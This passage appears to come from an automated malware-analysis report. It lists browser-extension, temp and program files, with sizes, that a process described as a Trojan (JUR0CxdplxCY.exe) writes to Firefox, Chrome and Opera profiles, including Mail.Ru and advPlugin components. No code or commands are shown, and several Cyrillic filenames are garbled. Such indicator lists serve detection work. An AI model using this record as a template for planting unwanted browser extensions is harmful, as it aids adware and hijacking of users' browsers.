C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\01.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\mail-counter.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-3.png (723 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Mail.Ru ÃÂÃÂ³ÃÂµÃÂ½Ã‘â€š - ÃÂ¸Ã‘ÂÃÂ¿ÃÂ¾ÃÂ»Ã‘Å’ÃÂ·Ã‘Æ’ÃÂ¹ ÃÂ´ÃÂ»Ã‘Â ÃÂ¾ÃÂ±Ã‘â€°ÃÂµÃÂ½ÃÂ¸Ã‘Â!.url (210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-5.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\flax.jpg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-1.png (407 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-9.jpg (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\07.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\grid.css (450 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\searchplugins\mailru.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-3.jpg (119 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-9.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\03.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\08.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-4.jpg (255 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-11.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_fabric.jpg (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\background\background.html (610 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-4.png (802 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\16x16.png (448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\05.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__arrow-right.png (368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\sgmus.png (211 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\favicon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\searchbar.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\09.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\torg.mail.ru.jpeg (60 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\manifest.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\reg1.bg.v2.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\utils\utils.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\main.js (268 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\general.css (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\games.mail.ru.jpeg (76 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\leather.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\48x48.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-3.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\gdknicmnhbaajdglbinpahhapghpakch.7z (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\03.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\search_bg.png (499 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\search-metadata.json (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-1.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (280 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\overlay.xul (442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\512.png (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\libs\jquery.js (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-6.jpg (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\zigbert.rsa (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\customScrollbar.css (320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\Utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\ajax_loader_mc.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\01.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\dialog.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Mail.Ru.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-edit-hover.png (406 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\08.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\10.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-8.jpg (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\jedelkhanefmcnpappfhachbpnlhomai.7z (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\currency.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-6.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\no_photo.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\searchbar.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-10.jpg (157 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\slider.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ie.reg (128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\odnoklassniki-counter.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\application_core\sqliteStorage.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Sputnik\MailRu.ico (14076 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-7.jpg (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\cookies.jpg (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\pane.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\menu__item\menu__item-1.png (622 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\proto\tab-strip.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mail.Ru\Tmp\pganlglbhgfjfgopijbhemcpbehjnpia.7z (494308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\calendar.mail.ru.jpeg (41 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\traffic\informers__traffic-jam.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\slide.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-1.jpg (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_wall.jpg (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slide__control\slide__control-delete-hover.png (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\_metadata\computed_hashes.json (371 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\visual-bookmarks.html (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\02.png (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\pane-arrow.png (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\META-INF\zigbert.sf (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\p-main_sub__gradient.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\icons\128.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\thumbnails\travel.mail.ru.jpeg (80 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\body__bg-13.jpg (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\themes__theme-fade-wrong.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\wood.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\weather\06.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\css\news.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\geo-monitoring.js (2 bytes)
C:\Users\"%CurrentUserName%"\Desktop\ÃËœÃ‘ÂÃÂºÃÂ°Ã‘â€šÃ‘Å’ ÃÂ² ÃËœÃÂ½Ã‘â€šÃÂµÃ‘â‚¬ÃÂ½ÃÂµÃ‘â€šÃÂµ.url (174 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Preferences (484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\shortcut.js (423 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\favorites.db-journal (2882 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\jedelkhanefmcnpappfhachbpnlhomai\1.0.7_0\_metadata\verified_contents.json (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\weather.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\bookmarks\drag_drop.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\slider-arrow.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\exchange\exchange-3.png (884 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\js\modules\traffic.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\informers\weather\04.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\wood_2.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\body__bg-10.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{a38384b3-2d1d-4f36-bc22-0f7ae402bcd7}\chrome\content\visual-bookmarks\images\themes\preview\_flax.jpg (7 bytes)

The process JUR0CxdplxCY.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\advPlugin\files\_locales\pt_PT\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\popup.js (364 bytes)
%Program Files% (x86)\advPlugin\files\_locales\th\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsl27CD.tmp\nsProcess.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\et\messages.json (326 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\gu\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\pl\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\skin\bindings.xml (1 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ml\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ms\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\ta\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\chrome\_locales\he\messages.json (341 bytes)
%Program Files% (x86)\advPlugin\files\_locales\ko\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\extensionInstallerHelperFolder_971798\FFExtension\install.rdf (16 bytes)
%Program Files% (x86)\advPlugin\files\_locales\bn\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome.manifest (78 bytes)
%Program Files% (x86)\advPlugin\files\_locales\fi\messages.json (346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\files\popup.css (192 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\be\messages.json (437 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\{1FE48F08-A2AC-44AC-A21C-0556D91C50DA}\chrome\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\hi\messages.json (341 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Opera Software\Opera Stable\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\pt\messages.json (349 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Extensions\dkgpajbdcbgaciibdeknligdaofmegma\1.2.15_0\_locales\gu\messages.json (341 bytes)
